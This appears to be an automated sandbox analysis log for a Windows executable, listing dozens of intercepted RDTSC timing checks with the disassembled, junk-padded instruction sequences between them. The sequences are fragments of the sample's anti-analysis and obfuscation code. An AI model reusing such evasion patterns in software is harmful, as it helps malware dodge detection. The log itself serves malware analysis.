                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DE80B second address: 5DE81A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DE81A second address: 5DE81F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DE81F second address: 5DE824 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5E17E9 second address: 5E181B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ED06h 0x00000007 ja 00007FC57CD4ECF6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 jmp 00007FC57CD4ED00h 0x00000015 pop esi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5E181B second address: 5E183F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC57C52C322h 0x00000008 pushad 0x00000009 jmp 00007FC57C52C31Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DF7F0 second address: 5DF7F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DF7F7 second address: 5DF80A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DF80A second address: 5DF882 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 cmc 0x00000009 jmp 00007FC57CD4ECFCh 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007FC57CD4ECF8h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 0000001Ch 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 mov eax, dword ptr [ebp+122D0BB5h] 0x0000003c mov dword ptr [ebp+1244ECC7h], edi 0x00000042 push FFFFFFFFh 0x00000044 or edi, dword ptr [ebp+122D1A31h] 0x0000004a nop 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e jmp 00007FC57CD4ED06h 0x00000053 pushad 0x00000054 popad 0x00000055 popad 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DF882 second address: 5DF8A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C327h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FC57C52C316h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5E40A2 second address: 5E40A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5E302F second address: 5E3033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5E81CF second address: 5E81EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ED00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007FC57CD4ECF6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5E92F3 second address: 5E92F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5EA3D0 second address: 5EA3D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5EA3D4 second address: 5EA3D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5EA3D8 second address: 5EA3DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5EA54C second address: 5EA5FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C321h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC57C52C327h 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 movsx edi, cx 0x00000015 push dword ptr fs:[00000000h] 0x0000001c jmp 00007FC57C52C325h 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 push 00000000h 0x0000002a push esi 0x0000002b call 00007FC57C52C318h 0x00000030 pop esi 0x00000031 mov dword ptr [esp+04h], esi 0x00000035 add dword ptr [esp+04h], 00000015h 0x0000003d inc esi 0x0000003e push esi 0x0000003f ret 0x00000040 pop esi 0x00000041 ret 0x00000042 xor edi, dword ptr [ebp+122D214Ch] 0x00000048 mov eax, dword ptr [ebp+122D15B1h] 0x0000004e stc 0x0000004f push FFFFFFFFh 0x00000051 call 00007FC57C52C328h 0x00000056 mov bx, ax 0x00000059 pop edi 0x0000005a nop 0x0000005b pushad 0x0000005c jnc 00007FC57C52C318h 0x00000062 pushad 0x00000063 popad 0x00000064 push eax 0x00000065 push edx 0x00000066 jne 00007FC57C52C316h 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5EA5FC second address: 5EA614 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC57CD4ECFEh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5F0553 second address: 5F0559 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5F0559 second address: 5F0571 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC57CD4ED02h 0x00000008 je 00007FC57CD4ECF6h 0x0000000e jns 00007FC57CD4ECF6h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5F3726 second address: 5F372A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5F372A second address: 5F3730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5F3730 second address: 5F374B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC57C52C321h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5F3A32 second address: 5F3A36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5F3A36 second address: 5F3A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC57C52C324h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5F3A50 second address: 5F3A57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5F3A57 second address: 5F3A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5F3BB4 second address: 5F3BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC57CD4ECFDh 0x00000009 popad 0x0000000a pop ebx 0x0000000b jc 00007FC57CD4ED0Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007FC57CD4ECF6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5F3BD5 second address: 5F3BDB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5F9A26 second address: 5F9A97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ED06h 0x00000007 jg 00007FC57CD4ED11h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC57CD4ECFDh 0x00000016 pushad 0x00000017 jmp 00007FC57CD4ECFDh 0x0000001c jmp 00007FC57CD4ED02h 0x00000021 jng 00007FC57CD4ECF6h 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5FFE87 second address: 5FFEA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC57C52C331h 0x0000000a jmp 00007FC57C52C325h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5FF1E9 second address: 5FF1EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5FF4B8 second address: 5FF4BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5FF4BD second address: 5FF4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC57CD4ED00h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5FF4D5 second address: 5FF4E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jo 00007FC57C52C31Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5FF666 second address: 5FF673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007FC57CD4ECF6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5FFD22 second address: 5FFD28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5FFD28 second address: 5FFD2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 60599B second address: 6059C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FC57C52C322h 0x0000000a jmp 00007FC57C52C31Ah 0x0000000f push esi 0x00000010 pop esi 0x00000011 pushad 0x00000012 push edi 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FC57C52C31Bh 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6059C3 second address: 6059D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FC57CD4ECF6h 0x0000000e jns 00007FC57CD4ECF6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 604E3A second address: 604E58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C327h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 604E58 second address: 604E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC57CD4ED09h 0x00000009 popad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 604E79 second address: 604E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FC57C52C31Ah 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 604E8C second address: 604EB0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC57CD4ECF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jmp 00007FC57CD4ED05h 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 604EB0 second address: 604EB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 60567A second address: 6056CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ED09h 0x00000007 jmp 00007FC57CD4ECFEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007FC57CD4ED10h 0x00000016 push esi 0x00000017 jg 00007FC57CD4ECF6h 0x0000001d pop esi 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6056CF second address: 6056E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FC57C52C31Fh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6056E8 second address: 6056EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6056EC second address: 6056F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 58F294 second address: 58F298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 58F298 second address: 58F29E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CD483 second address: 5B2C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FC57CD4ED05h 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FC57CD4ECF8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov edx, dword ptr [ebp+122D1A4Ah] 0x0000002c mov edi, dword ptr [ebp+122D370Ah] 0x00000032 call dword ptr [ebp+122D22C3h] 0x00000038 pushad 0x00000039 pushad 0x0000003a jmp 00007FC57CD4ECFBh 0x0000003f jmp 00007FC57CD4ECFEh 0x00000044 jmp 00007FC57CD4ECFFh 0x00000049 popad 0x0000004a jmp 00007FC57CD4ED06h 0x0000004f popad 0x00000050 js 00007FC57CD4ED21h 0x00000056 push eax 0x00000057 push edx 0x00000058 jne 00007FC57CD4ECF6h 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CDABF second address: 5CDB5A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC57C52C316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push ebx 0x0000000d jmp 00007FC57C52C322h 0x00000012 pop ebx 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jns 00007FC57C52C31Eh 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 pushad 0x00000021 push eax 0x00000022 pop eax 0x00000023 push ecx 0x00000024 pop ecx 0x00000025 popad 0x00000026 pushad 0x00000027 pushad 0x00000028 popad 0x00000029 jmp 00007FC57C52C328h 0x0000002e popad 0x0000002f popad 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 jnc 00007FC57C52C31Eh 0x0000003a pop eax 0x0000003b push 00000000h 0x0000003d push edi 0x0000003e call 00007FC57C52C318h 0x00000043 pop edi 0x00000044 mov dword ptr [esp+04h], edi 0x00000048 add dword ptr [esp+04h], 00000014h 0x00000050 inc edi 0x00000051 push edi 0x00000052 ret 0x00000053 pop edi 0x00000054 ret 0x00000055 mov edx, 37668419h 0x0000005a call 00007FC57C52C319h 0x0000005f push eax 0x00000060 push edx 0x00000061 push ebx 0x00000062 pushad 0x00000063 popad 0x00000064 pop ebx 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CDB5A second address: 5CDB9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FC57CD4ED07h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jmp 00007FC57CD4ED09h 0x00000019 mov eax, dword ptr [eax] 0x0000001b push edx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CE390 second address: 5CE395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CE395 second address: 5CE422 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FC57CD4ECFDh 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007FC57CD4ECF8h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 jmp 00007FC57CD4ED09h 0x0000002e push 0000001Eh 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007FC57CD4ECF8h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 0000001Bh 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a mov dx, 6CF9h 0x0000004e nop 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FC57CD4ECFFh 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CE422 second address: 5CE433 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC57C52C316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CE804 second address: 5CE885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007FC57CD4ECFCh 0x0000000a nop 0x0000000b lea eax, dword ptr [ebp+12478212h] 0x00000011 mov dword ptr [ebp+122D3467h], ebx 0x00000017 push ebx 0x00000018 mov dx, 01B9h 0x0000001c pop edx 0x0000001d nop 0x0000001e push ebx 0x0000001f jmp 00007FC57CD4ED01h 0x00000024 pop ebx 0x00000025 push eax 0x00000026 pushad 0x00000027 jg 00007FC57CD4ECF8h 0x0000002d pushad 0x0000002e jmp 00007FC57CD4ECFAh 0x00000033 pushad 0x00000034 popad 0x00000035 popad 0x00000036 popad 0x00000037 nop 0x00000038 sub dword ptr [ebp+122D1A80h], ecx 0x0000003e lea eax, dword ptr [ebp+124781CEh] 0x00000044 mov dword ptr [ebp+122D1CE8h], ebx 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d push esi 0x0000004e jmp 00007FC57CD4ED08h 0x00000053 pop esi 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CE885 second address: 5B37A3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC57C52C318h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007FC57C52C318h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 mov dx, si 0x0000002c call dword ptr [ebp+1244F3D0h] 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5B37A3 second address: 5B37A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5B37A7 second address: 5B37F0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC57C52C316h 0x00000008 jno 00007FC57C52C316h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jng 00007FC57C52C316h 0x00000017 push eax 0x00000018 pop eax 0x00000019 jng 00007FC57C52C316h 0x0000001f popad 0x00000020 jno 00007FC57C52C31Eh 0x00000026 push eax 0x00000027 push edx 0x00000028 push ecx 0x00000029 pop ecx 0x0000002a jmp 00007FC57C52C327h 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6095A9 second address: 6095B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6095B0 second address: 6095B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6095B5 second address: 6095E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC57CD4ECF6h 0x0000000a jl 00007FC57CD4ECF6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007FC57CD4ECF6h 0x00000019 jmp 00007FC57CD4ED05h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 60987A second address: 60988A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C31Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 60988A second address: 6098A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC57CD4ECFBh 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 609A1A second address: 609A33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C322h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 609A33 second address: 609A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007FC57CD4ED00h 0x0000000d popad 0x0000000e jmp 00007FC57CD4ED02h 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 609BDA second address: 609BE4 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC57C52C316h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 609BE4 second address: 609BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 609BEE second address: 609BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
